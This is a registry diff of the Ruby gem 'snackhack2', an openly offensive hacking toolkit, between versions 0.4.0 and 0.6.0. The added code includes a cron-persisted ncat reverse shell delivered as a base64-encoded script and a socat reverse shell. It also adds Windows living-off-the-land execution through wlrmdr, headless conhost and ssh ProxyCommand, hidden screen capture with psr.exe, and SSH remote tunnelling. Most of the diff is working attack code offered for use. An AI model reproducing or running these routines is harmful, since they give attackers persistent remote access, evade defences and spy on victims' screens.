snackhack2 0.4.0 → 0.6.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- checksums.yaml +4 -4
- data/lib/snackhack2/forward_remote.rb +23 -0
- data/lib/snackhack2/indirect_command_injection.rb +27 -0
- data/lib/snackhack2/phone_number.rb +2 -2
- data/lib/snackhack2/portscan.rb +23 -6
- data/lib/snackhack2/reverse_shell.rb +12 -0
- data/lib/snackhack2/screenshots.rb +21 -0
- data/lib/snackhack2/version.rb +1 -1
- data/lib/snackhack2.rb +21 -5
- metadata +5 -2
checksums.yaml
CHANGED
|
@@ -1,7 +1,7 @@
|
|
|
1
1
|
---
|
|
2
2
|
SHA256:
|
|
3
|
-
metadata.gz:
|
|
4
|
-
data.tar.gz:
|
|
3
|
+
metadata.gz: 91c1c06a465134768119913da56c3cd2431d523bbba508d40247e4ac35b58080
|
|
4
|
+
data.tar.gz: e40b136a7b30a151e4a72e0a783399ea08196dfe9ede37df8a6baba1116e1c9a
|
|
5
5
|
SHA512:
|
|
6
|
-
metadata.gz:
|
|
7
|
-
data.tar.gz:
|
|
6
|
+
metadata.gz: 4fd58e1fbbe4f408ccd002ca9d3581c92308d1ab05c8147a978d502b782d67c5e867cbed43c76d8b99ba7dcd8413555b6ec65e270797688791baf2e36c02b14f
|
|
7
|
+
data.tar.gz: ee3506348b912fc05319b5be0f22699ca780f47cf471060dcb6d41685f4607be709de140356331249309de2d768554853a4c536ec67836e338be5731681a5866
|
|
@@ -0,0 +1,23 @@
|
|
|
1
|
+
require 'net/ssh'
|
|
2
|
+
module Snackhack2
|
|
3
|
+
class SSHForwardRemote
|
|
4
|
+
attr_accessor :site, :user, :pass, :key, :lport, :lsite, :rport
|
|
5
|
+
|
|
6
|
+
def initialize
|
|
7
|
+
@site = site
|
|
8
|
+
@user = user
|
|
9
|
+
@pass = pass
|
|
10
|
+
@key = key
|
|
11
|
+
@lport = lport
|
|
12
|
+
@lsite = lsite
|
|
13
|
+
@rport = rport
|
|
14
|
+
end
|
|
15
|
+
def run
|
|
16
|
+
Net::SSH.start(@site, @user, :password => @pass, :keys => @key) do |ssh|
|
|
17
|
+
ssh.forward.remote(@lport, @lsite, @rport)
|
|
18
|
+
puts "[+] Starting SSH remote forward tunnel"
|
|
19
|
+
ssh.loop { true }
|
|
20
|
+
end
|
|
21
|
+
end
|
|
22
|
+
end
|
|
23
|
+
end
|
|
@@ -0,0 +1,27 @@
|
|
|
1
|
+
module Snackhack2
|
|
2
|
+
class CommandInjection
|
|
3
|
+
attr_accessor :exe, :title, :prompt
|
|
4
|
+
def initialize
|
|
5
|
+
@exe = "calc.exe"
|
|
6
|
+
@title = "Click me!"
|
|
7
|
+
@prompt = "To run calculator"
|
|
8
|
+
end
|
|
9
|
+
def wlrmdr_With_prompt
|
|
10
|
+
Process.spawn("wlrmdr.exe -s 3600 -f 0 -t #{title} -m #{@prompt} -a 10 -u #{@exe}")
|
|
11
|
+
end
|
|
12
|
+
def wlrmdr_without_prompt
|
|
13
|
+
Process.spawn("wlrmdr.exe -s 3600 -f 0 -t _ -m _ -a 11 -u #{@exe}")
|
|
14
|
+
end
|
|
15
|
+
def conhost
|
|
16
|
+
Process.spawn("conhost.exe #{@exe}")
|
|
17
|
+
end
|
|
18
|
+
def conhost_hide
|
|
19
|
+
# Specify --headless parameter to hide child process window (if applicable)
|
|
20
|
+
Process.spawn("conhost.exe --headless #{@exe}")
|
|
21
|
+
def ssh
|
|
22
|
+
Process.spawn("ssh -o ProxyCommand=#{@exe} .")
|
|
23
|
+
end
|
|
24
|
+
end
|
|
25
|
+
end
|
|
26
|
+
|
|
27
|
+
|
|
@@ -18,8 +18,8 @@ module Snackhack2
|
|
|
18
18
|
http = Snackhack2::get(@site)
|
|
19
19
|
if http.code == 200
|
|
20
20
|
regex = http.body
|
|
21
|
-
|
|
22
|
-
out =
|
|
21
|
+
phone = regex.scan(/((\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]\d{3}[\s.-]\d{4})/)
|
|
22
|
+
out = phone.map { |n| n[0] }.compact
|
|
23
23
|
numbers << out
|
|
24
24
|
else
|
|
25
25
|
puts "[+] Status code: #{http.code}"
|
data/lib/snackhack2/portscan.rb
CHANGED
|
@@ -1,10 +1,13 @@
|
|
|
1
1
|
# frozen_string_literal: true
|
|
2
2
|
|
|
3
|
-
|
|
3
|
+
|
|
4
4
|
module Snackhack2
|
|
5
5
|
class PortScan
|
|
6
|
-
|
|
6
|
+
attr_accessor :display, :ip, :delete
|
|
7
|
+
def initialize(ip, display: true, delete: false)
|
|
7
8
|
@ip = ip
|
|
9
|
+
@display = display
|
|
10
|
+
@delete = delete
|
|
8
11
|
end
|
|
9
12
|
|
|
10
13
|
def run
|
|
@@ -13,8 +16,20 @@ module Snackhack2
|
|
|
13
16
|
ports.each { |i| threads << Thread.new { tcp(i) } }
|
|
14
17
|
threads.each(&:join)
|
|
15
18
|
end
|
|
16
|
-
|
|
19
|
+
def ports_extractor(port)
|
|
20
|
+
ip=[]
|
|
21
|
+
files = Dir['*_port_scan.txt']
|
|
22
|
+
files.each do |f|
|
|
23
|
+
r=File.read(f)
|
|
24
|
+
if r.include?(port)
|
|
25
|
+
ip << f.split("_")[0]
|
|
26
|
+
end
|
|
27
|
+
File.delete(f) if delete
|
|
28
|
+
end
|
|
29
|
+
File.open("#{port}_scan.txt", 'w+') { |file| file.write(ip.join("\n")) }
|
|
30
|
+
end
|
|
17
31
|
def tcp(i)
|
|
32
|
+
ip = @ip
|
|
18
33
|
open_ports = []
|
|
19
34
|
begin
|
|
20
35
|
Timeout.timeout(1) do
|
|
@@ -27,10 +42,12 @@ module Snackhack2
|
|
|
27
42
|
rescue Timeout::Error
|
|
28
43
|
end
|
|
29
44
|
return if open_ports.empty?
|
|
30
|
-
|
|
31
|
-
|
|
32
|
-
|
|
45
|
+
if @display
|
|
46
|
+
open_ports.each do |port|
|
|
47
|
+
puts "#{port} is open"
|
|
48
|
+
end
|
|
33
49
|
end
|
|
50
|
+
File.open("#{ip}_port_scan.txt", 'a') { |file| file.write(open_ports.shift.to_s+ "\n") }
|
|
34
51
|
end
|
|
35
52
|
end
|
|
36
53
|
end
|
|
@@ -12,5 +12,17 @@ module Snackhack2
|
|
|
12
12
|
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
|
|
13
13
|
puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
|
|
14
14
|
end
|
|
15
|
+
def version2
|
|
16
|
+
c = %Q{#!/bin/bash
|
|
17
|
+
line="* * * * * ncat #{@ip} #{@port} -e /bin/bash"
|
|
18
|
+
(crontab -u $(whoami) -l; echo "$line" ) | crontab -u $(whoami) -}
|
|
19
|
+
puts "echo -n '#{Base64.encode64(c)}' | base64 -d >> t.sh; bash t.sh; rm t.sh;".delete!("\n")
|
|
20
|
+
end
|
|
21
|
+
def bash
|
|
22
|
+
c = %Q{
|
|
23
|
+
bash.exe -c "socat tcp-connect:#{@ip}:#{@port} exec:sh,pty,stderr,setsid,sigint,sane"
|
|
24
|
+
}
|
|
25
|
+
Process.spawn(c)
|
|
26
|
+
end
|
|
15
27
|
end
|
|
16
28
|
end
|
|
@@ -0,0 +1,21 @@
|
|
|
1
|
+
require 'shellwords'
|
|
2
|
+
module Snackhack2
|
|
3
|
+
class ScreenShot
|
|
4
|
+
attr_accessor :zip, :time
|
|
5
|
+
# https://lolbas-project.github.io/lolbas/Binaries/Psr/
|
|
6
|
+
def initialize
|
|
7
|
+
@zip = "screenshots.zip"
|
|
8
|
+
@time = 60
|
|
9
|
+
end
|
|
10
|
+
def run
|
|
11
|
+
File.open("lol.bat", 'w+') { |file| file.write("psr.exe /start /output #{@zip} /sc 1 /gui 0") }
|
|
12
|
+
File.open("lol2.bat", 'w+') { |file| file.write("psr.exe /stop") }
|
|
13
|
+
Process.spawn("lol.bat")
|
|
14
|
+
sleep @time.to_i
|
|
15
|
+
system("lol2.bat")
|
|
16
|
+
sleep 2
|
|
17
|
+
File.delete("lol.bat")
|
|
18
|
+
File.delete("lol2.bat")
|
|
19
|
+
end
|
|
20
|
+
end
|
|
21
|
+
end
|
data/lib/snackhack2/version.rb
CHANGED
data/lib/snackhack2.rb
CHANGED
|
@@ -25,6 +25,9 @@ require_relative 'snackhack2/sitemap'
|
|
|
25
25
|
require_relative 'snackhack2/tomcat'
|
|
26
26
|
require_relative 'snackhack2/subdomains2'
|
|
27
27
|
require_relative 'snackhack2/reverse_shell'
|
|
28
|
+
require_relative 'snackhack2/forward_remote'
|
|
29
|
+
require_relative 'snackhack2/screenshots'
|
|
30
|
+
require_relative 'snackhack2/indirect_command_injection'
|
|
28
31
|
|
|
29
32
|
module Snackhack2
|
|
30
33
|
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
|
|
@@ -46,14 +49,27 @@ module Snackhack2
|
|
|
46
49
|
end
|
|
47
50
|
end
|
|
48
51
|
end
|
|
49
|
-
|
|
50
|
-
|
|
51
|
-
|
|
52
|
-
|
|
53
|
-
puts "[+] Saving file to #{hostname}_#{type}.txt..."
|
|
52
|
+
def self.file_save(site, type, content, ip:false)
|
|
53
|
+
hostname = URI.parse(site).host
|
|
54
|
+
File.open("#{hostname}_#{type}.txt", 'w+') { |file| file.write(content) }
|
|
55
|
+
puts "[+] Saving file to #{hostname}_#{type}.txt..."
|
|
54
56
|
end
|
|
55
57
|
|
|
56
58
|
def self.get(site)
|
|
57
59
|
HTTParty.get(site, { headers: { "User-Agent" => UA } })
|
|
58
60
|
end
|
|
61
|
+
|
|
62
|
+
def self.clean_portscan
|
|
63
|
+
Dir['*_port_scan.txt'].each do |file|
|
|
64
|
+
puts "[+] deleting #{file}..."
|
|
65
|
+
File.delete(file)
|
|
66
|
+
end
|
|
67
|
+
end
|
|
68
|
+
def self.read_portscan
|
|
69
|
+
files = Dir['*_port_scan.txt']
|
|
70
|
+
files.each do |f|
|
|
71
|
+
read = File.read(f)
|
|
72
|
+
puts "#{f.split('_')[0]}: #{read}"
|
|
73
|
+
end
|
|
74
|
+
end
|
|
59
75
|
end
|
metadata
CHANGED
|
@@ -1,14 +1,14 @@
|
|
|
1
1
|
--- !ruby/object:Gem::Specification
|
|
2
2
|
name: snackhack2
|
|
3
3
|
version: !ruby/object:Gem::Version
|
|
4
|
-
version: 0.
|
|
4
|
+
version: 0.6.0
|
|
5
5
|
platform: ruby
|
|
6
6
|
authors:
|
|
7
7
|
- mike
|
|
8
8
|
autorequire:
|
|
9
9
|
bindir: exe
|
|
10
10
|
cert_chain: []
|
|
11
|
-
date: 2024-
|
|
11
|
+
date: 2024-09-02 00:00:00.000000000 Z
|
|
12
12
|
dependencies:
|
|
13
13
|
- !ruby/object:Gem::Dependency
|
|
14
14
|
name: httparty
|
|
@@ -66,7 +66,9 @@ files:
|
|
|
66
66
|
- lib/snackhack2/cryptoextractor.rb
|
|
67
67
|
- lib/snackhack2/drupal.rb
|
|
68
68
|
- lib/snackhack2/emails.rb
|
|
69
|
+
- lib/snackhack2/forward_remote.rb
|
|
69
70
|
- lib/snackhack2/google_analytics.rb
|
|
71
|
+
- lib/snackhack2/indirect_command_injection.rb
|
|
70
72
|
- lib/snackhack2/iplookup.rb
|
|
71
73
|
- lib/snackhack2/lists/sshbrute.txt
|
|
72
74
|
- lib/snackhack2/lists/subdomains.txt
|
|
@@ -74,6 +76,7 @@ files:
|
|
|
74
76
|
- lib/snackhack2/portscan.rb
|
|
75
77
|
- lib/snackhack2/reverse_shell.rb
|
|
76
78
|
- lib/snackhack2/robots.rb
|
|
79
|
+
- lib/snackhack2/screenshots.rb
|
|
77
80
|
- lib/snackhack2/sitemap.rb
|
|
78
81
|
- lib/snackhack2/sshbrute.rb
|
|
79
82
|
- lib/snackhack2/subdomains.rb
|